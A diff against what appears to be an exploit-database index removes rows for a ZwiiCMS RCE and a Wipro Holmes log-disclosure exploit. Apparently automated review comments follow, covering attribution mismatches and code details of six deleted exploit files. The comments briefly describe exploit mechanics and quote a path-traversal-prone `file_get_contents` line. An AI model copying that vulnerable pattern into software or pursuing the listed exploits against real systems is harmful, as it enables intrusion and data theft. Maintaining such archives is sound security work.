@@ -34929,7 +34925,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46420,exploits/php/webapps/46420.txt,"Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting",2019-02-19,"Deyaa Muhammad",webapps,php,80,2019-02-19,2019-02-19,0,,"Cross-Site Scripting (XSS)",,,, 28842,exploits/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,webapps,php,,2006-10-23,2013-10-10,1,CVE-2006-5512;OSVDB-30007,,,,,https://www.securityfocus.com/bid/20682/info 15945,exploits/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",webapps,php,,2011-01-08,2011-01-08,0,OSVDB-70395;CVE-2011-0505,,,,http://www.exploit-db.comzwii_5147.zip, -52050,exploits/php/webapps/52050.txt,"ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated)",2024-06-14,ub3rsick,webapps,php,,2024-06-14,2024-06-14,0,,,,,, 24772,exploits/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,php,,2004-11-24,2013-03-14,1,CVE-2004-1075;OSVDB-12116,,,,,https://www.securityfocus.com/bid/11745/info 12454,exploits/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,webapps,php,,2010-04-28,,1,,,,,, 12262,exploits/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",webapps,php,,2010-04-15,,0,,,,,http://www.exploit-db.comZykeCMSV1.0.zip, 
@@ -45730,7 +45725,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,remote,windows,,2007-03-05,,1,OSVDB-30432;CVE-2006-3890,,,,, 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,,2006-11-14,2016-09-14,1,CVE-2006-6884,,,,http://www.exploit-db.comwinzip110.exe, 16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2011-03-10,1,CVE-2006-5198;OSVDB-30433,"Metasploit Framework (MSF)",,,, -52032,exploits/windows/remote/52032.py,"Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure",2024-06-01,ub3rsick,remote,windows,,2024-06-01,2024-06-01,0,CVE-2021-38283,,,,, 18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows,,2011-11-19,2011-11-19,1,CVE-2011-3360;OSVDB-75347,"Metasploit Framework (MSF)",,,,http://technet.microsoft.com/en-us/security/advisory/2269637 11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows,,2010-02-14,2010-09-05,1,,,,http://www.exploit-db.com/screenshots/idlt11500/wire-poc.png,http://www.exploit-db.comwireshark-win32-1.2.5.exe, 17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,remote,windows,,2011-04-21,2011-04-21,1,CVE-2011-1591;OSVDB-71848,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.4.1.exe,
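Review bot: In the exploits/hardware/remote/52033.txt hunk (@@ -1,61 +0,0 @@), the deleted file's header credits d1g@segfault.net for NetworkSEC with date 2023-02-16, while the files_exploits.csv row removed further down records the author as ub3rsick and the date as 2024-06-01; the deletion resolves that inconsistency, but neither the commit message nor the diff states why the entry is withdrawn (misattributed import, duplicate, or takedown), and the reason belongs in the commit message. A minor point if the advisory is ever re-imported under its original author: the first `snmpbulkwalk` example targets `x.x.x` where every other placeholder in the file reads `x.x.x.x`.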
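Review bot: In the exploits/hardware/remote/52049.rb hunk (@@ -1,152 +0,0 @@), the module header names sf as author with CVE-2023-28771 and a 2023-03-31 disclosure date, yet the CSV row removed later lists ub3rsick, 2024-06-14 and an empty CVE column, and unlike the neighbouring Metasploit entries in that CSV hunk (for example row 44524) it carries no "Metasploit Framework (MSF)" tag; if this module is re-added, the row should carry the upstream author, the CVE and the MSF tag. Also, in `check` the variable named `ikev2_header` builds an IKEv1 header (Version byte 16 = 1.0, Exchange Type 2 = Identity Protection, exactly as the inline comments say), so `ikev1_header` would describe it; the IKEv2 naming is accurate only in `execute_command`.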
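Review bot: In the exploits/multiple/webapps/52051.txt hunk (@@ -1,41 +0,0 @@), the header gives Alexey Pronin, 2020-06-03 and CVE-2020-13802, but the CSV row removed below attributes the entry to ub3rsick with date 2024-06-14 and leaves the CVE column empty even though the file itself states the CVE; removing the mis-indexed row is correct, and any re-import should restore the original author, publication date and CVE-2020-13802 in files_exploits.csv so the entry is searchable by CVE.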
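Review bot: In the exploits/php/webapps/52034.txt hunk (@@ -1,111 +0,0 @@), the deleted advisory is a SEC Consult publication by Steffen Rogge dated 2022.01.26, whereas the CSV row removed below lists ub3rsick and 2024-06-01, so only the CVE-2022-23409 field agreed between file and index; the attribution mismatch is visible only by cross-reading the CSV hunks, so the commit message should spell out the withdrawal reason. For any re-import: the header date uses a dotted 2022.01.26 form while the other headers in this patch and the CSV use ISO dates, and the quoted controller excerpt, `file_get_contents($logsDir . '/' . $currentLog)` with the `log` parameter taken straight from the request, is the finding itself and should be kept verbatim alongside the referenced fix commit.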
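Review bot: In the exploits/php/webapps/52050.txt hunk (@@ -1,62 +0,0 @@), the header credits Hadi Mene with date 03/06/2023 and CVE-2020-10567, while the CSV row removed below lists ub3rsick, 2024-06-14 and no CVE; besides the attribution mismatch, the header date is in an ambiguous day/month order, and the product name "Responible FileManager" does not match the linked upstream issue, which lives under trippo/ResponsiveFilemanager. Both should be corrected, and the CVE column filled, if the advisory is re-imported under its original author.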
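Review bot: In the exploits/windows/remote/52032.py hunk (@@ -1,77 +0,0 @@), unlike the other five deletions in this patch the CSV row removed below agrees with the file header on author (ub3rsick) and CVE (CVE-2021-38283), differing only in date (2024-06-01 against the header's 09/08/2021), so the reason for withdrawing this entry is not evident from the diff and should be stated in the commit message. Code points visible in the deleted script, relevant if it is restored: `do_request` saves every 200 response via `resp.text` in text mode ('w') although `log_list` includes the binary `CustomerFile.zip`, which needs `resp.content` and 'wb'; `not "Wipro Ltd." in resp.text` reads more clearly as `"Wipro Ltd." not in resp.text`; the `ThreadPool` and `partial` imports are unused; and the argparse epilog spells the handle `@ub3sick` while the header has `@ub3rsick`.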